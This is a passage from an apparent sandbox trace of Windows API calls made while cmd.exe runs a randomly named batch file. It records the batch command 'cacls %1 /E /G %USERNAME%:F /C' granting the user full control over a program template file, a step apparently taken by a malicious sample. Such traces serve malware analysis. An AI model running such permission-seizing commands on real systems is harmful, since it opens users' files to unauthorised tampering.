(_String1="\"C", _String2="BREAK") returned -64 [0266.073] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0266.073] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0266.073] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0266.073] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0266.073] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0266.074] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0266.074] SetErrorMode (uMode=0x0) returned 0x0 [0266.074] SetErrorMode (uMode=0x1) returned 0x0 [0266.074] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\.", nBufferLength=0x208, lpBuffer=0x7605d0, lpFilePart=0x5ef3f4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x5ef3f4*="Desktop") returned 0x1d [0266.074] SetErrorMode (uMode=0x0) returned 0x1 [0266.075] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\.") returned 1 [0266.075] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0266.078] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0266.078] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", fInfoLevelId=0x1, lpFindFileData=0x5ef1a0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5ef1a0) returned 0x76b130 [0266.079] FindClose (in: hFindFile=0x76b130 | out: hFindFile=0x76b130) returned 1 [0266.079] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0266.079] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0266.079] GetConsoleTitleW (in: lpConsoleTitle=0x5ef674, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0266.079] ApiSetQueryApiSetPresence () returned 0x0 [0266.079] ResolveDelayLoadedAPI () returned 0x745414a0 [0266.081] SaferWorker () returned 0x0 [0266.096] SetErrorMode (uMode=0x0) returned 0x0 [0266.096] SetErrorMode (uMode=0x1) returned 0x0 [0266.096] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", nBufferLength=0x104, lpBuffer=0x76ad10, lpFilePart=0x5ef524 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFilePart=0x5ef524*="vRnqNMBW.bat") returned 0x2a [0266.096] SetErrorMode (uMode=0x0) returned 0x1 [0266.096] wcsspn (_String=" \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\"", _Control=" \x09") returned 0x1 [0266.096] CmdBatNotificationStub () returned 0x1 [0266.097] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x5ef5b4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0266.097] _open_osfhandle (_OSFileHandle=0xb4, _Flags=8) returned 3 [0266.097] _get_osfhandle (_FileHandle=3) returned 0xb4 [0266.097] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0266.097] _get_osfhandle (_FileHandle=3) returned 0xb4 [0266.097] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0266.097] ReadFile (in: hFile=0xb4, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x5ef584, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x5ef584*=0xe2, lpOverlapped=0x0) returned 1 [0266.097] SetFilePointer (in: hFile=0xb4, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0266.097] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=32, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\n") returned 32 [0266.098] _get_osfhandle (_FileHandle=3) returned 0xb4 [0266.098] GetFileType (hFile=0xb4) returned 0x1 [0266.098] _get_osfhandle (_FileHandle=3) returned 0xb4 [0266.098] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0266.098] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="CIiHmnxMn6Ps") returned 0xc [0266.099] _wcsicmp (_String1="cacls", _String2=")") returned 58 [0266.099] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0266.099] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0266.099] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0266.099] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0266.099] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0266.099] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0266.100] _tell (_FileHandle=3) returned 32 [0266.100] _close (_FileHandle=3) returned 0 [0266.101] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x5ef348 | out: _Buffer="\r\n") returned 2 [0266.101] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.101] GetFileType (hFile=0x3c) returned 0x2 [0266.101] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0266.101] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef320 | out: lpMode=0x5ef320) returned 1 [0266.118] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.118] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x5ef338, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x5ef338*=0x2) returned 1 [0266.230] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0266.230] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0266.230] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x5ef344 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0266.230] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x5ef344 | out: _Buffer=">") returned 1 [0266.230] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.230] GetFileType (hFile=0x3c) returned 0x2 [0266.230] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0266.230] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef324 | out: lpMode=0x5ef324) returned 1 [0266.627] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.627] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x5ef33c, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x5ef33c*=0x1e) returned 1 [0267.075] _get_osfhandle (_FileHandle=1) returned 0x3c [0267.075] GetFileType (hFile=0x3c) returned 0x2 [0267.075] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0267.075] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef5c4 | out: lpMode=0x5ef5c4) returned 1 [0267.120] _get_osfhandle (_FileHandle=1) returned 0x3c [0267.120] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x7676d0*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x5ef5dc, lpReserved=0x0 | out: lpBuffer=0x7676d0*, lpNumberOfCharsWritten=0x5ef5dc*=0x5) returned 1 [0267.225] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x5ef5e4 | out: _Buffer=" \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\" /E /G CIiHmnxMn6Ps:F /C ") returned 80 [0267.225] _get_osfhandle (_FileHandle=1) returned 0x3c [0267.225] GetFileType (hFile=0x3c) returned 0x2 [0267.225] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0267.225] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef5bc | out: lpMode=0x5ef5bc) returned 1 [0267.253] _get_osfhandle (_FileHandle=1) returned 0x3c [0267.253] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x50, lpNumberOfCharsWritten=0x5ef5d4, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x5ef5d4*=0x50) returned 1 [0267.256] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x5ef5f8 | out: _Buffer="\r\n") returned 2 [0267.256] _get_osfhandle (_FileHandle=1) returned 0x3c [0267.256] GetFileType (hFile=0x3c) returned 0x2 [0267.256] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0267.256] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef5d0 | out: lpMode=0x5ef5d0) returned 1 [0267.257] _get_osfhandle (_FileHandle=1) returned 0x3c [0267.257] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x5ef5e8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x5ef5e8*=0x2) returned 1 [0267.688] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0267.688] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0267.688] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0267.688] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0267.688] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0267.688] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0267.688] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0267.689] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0267.689] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0267.689] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0267.689] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0267.689] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0267.689] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0267.689] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0267.689] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0267.689] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0267.689] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0267.689] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0267.689] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0267.689] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0267.689] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0267.689] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0267.689] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0267.689] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0267.689] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0267.689] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0267.689] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0267.689] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0267.689] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0267.689] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0267.689] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0267.689] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0267.689] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0267.689] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0267.689] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0267.689] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0267.689] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0267.689] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0267.689] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0267.689] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0267.689] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0267.689] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0267.689] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0267.690] SetErrorMode (uMode=0x0) returned 0x0 [0267.690] SetErrorMode (uMode=0x1) returned 0x0 [0267.690] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x76be88, lpFilePart=0x5ef394 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x5ef394*="Desktop") returned 0x1d [0267.690] SetErrorMode (uMode=0x0) returned 0x1 [0267.690] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0267.690] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0267.691] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0267.715] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0267.715] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x5ef120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5ef120) returned 0xffffffff [0267.715] GetLastError () returned 0x2 [0267.715] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0267.715] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x5ef120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5ef120) returned 0xffffffff [0267.715] GetLastError () returned 0x2 [0267.715] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0267.715] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x5ef120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5ef120) returned 0x76c220 [0267.716] FindClose (in: hFindFile=0x76c220 | out: hFindFile=0x76c220) returned 1 [0267.716] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x5ef120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5ef120) returned 0xffffffff [0267.716] GetLastError () returned 0x2 [0267.716] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x5ef120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5ef120) returned 0x76c220 [0267.716] FindClose (in: hFindFile=0x76c220 | out: hFindFile=0x76c220) returned 1 [0267.716] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0267.716] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0267.716] GetConsoleTitleW (in: lpConsoleTitle=0x5ef168, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0269.828] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0269.828] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0269.828] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0269.828] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0269.828] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0269.828] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0269.828] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0269.828] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0269.828] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0269.828] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0269.828] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0269.828] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0269.828] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0269.828] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0269.828] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0269.828] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0269.828] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0269.828] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0269.828] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0269.828] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0269.828] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0269.828] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0269.829] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0269.829] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0269.829] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0269.829] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0269.829] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0269.829] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0269.829] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0269.829] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0269.829] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0269.829] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0269.829] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0269.829] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0269.829] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0269.829] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0269.829] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0269.829] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0269.829] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0269.829] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0269.829] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0269.829] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0269.829] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0269.829] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0269.829] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0269.829] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0269.829] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0269.829] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0269.829] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0269.829] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0269.829] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0269.829] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0269.829] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0269.830] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0269.830] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0269.830] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0269.830] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0269.830] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0269.830] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0269.830] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0269.830] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0269.830] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0269.830] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0269.830] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0269.830] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0269.830] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0269.830] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0269.830] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0269.830] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0269.830] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0269.830] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0269.830] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0269.830] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0269.830] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0269.830] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0269.830] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0269.830] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0269.830] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0269.830] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0269.830] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0269.830] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0269.830] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0269.830] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0269.830] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0269.830] _wcsicmp (_String1="cacls", _String2="FOR") returned -3 [0269.830] _wcsicmp (_String1="cacls", _String2="IF") returned -6 [0269.830] _wcsicmp (_String1="cacls", _String2="REM") returned -15 [0269.830] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0269.830] SetErrorMode (uMode=0x0) returned 0x0 [0269.830] SetErrorMode (uMode=0x1) returned 0x0 [0269.830] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x76c500, lpFilePart=0x5eec74 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x5eec74*="Desktop") returned 0x1d [0269.830] SetErrorMode (uMode=0x0) returned 0x1 [0269.831] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0269.831] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0269.834] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0269.835] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0269.835] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x5eea00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5eea00) returned 0xffffffff [0269.835] GetLastError () returned 0x2 [0269.835] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0269.835] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x5eea00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5eea00) returned 0xffffffff [0269.835] GetLastError () returned 0x2 [0269.835] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0269.835] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x5eea00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5eea00) returned 0x76c898 [0269.835] FindClose (in: hFindFile=0x76c898 | out: hFindFile=0x76c898) returned 1 [0269.835] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x5eea00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5eea00) returned 0xffffffff [0269.835] GetLastError () returned 0x2 [0269.836] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x5eea00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5eea00) returned 0x76c898 [0269.836] FindClose (in: hFindFile=0x76c898 | out: hFindFile=0x76c898) returned 1 [0269.836] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0269.836] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0269.836] GetConsoleTitleW (in: lpConsoleTitle=0x5eeef4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0271.890] InitializeProcThreadAttributeList (in: lpAttributeList=0x5eee20, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x5eee04 | out: lpAttributeList=0x5eee20, lpSize=0x5eee04) returned 1 [0271.890] UpdateProcThreadAttribute (in: lpAttributeList=0x5eee20, dwFlags=0x0, Attribute=0x60001, lpValue=0x5eee0c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x5eee20, lpPreviousValue=0x0) returned 1 [0271.890] GetStartupInfoW (in: lpStartupInfo=0x5eee58 | out: lpStartupInfo=0x5eee58*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0271.890] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0271.890] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0271.890] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0271.890] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0271.890] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0271.890] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0271.890] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0271.890] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0271.890] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0271.890] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0271.890] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0271.890] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0271.890] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0271.890] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0271.890] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0271.890] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0271.890] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0271.890] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0271.890] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0271.890] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0271.890] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned 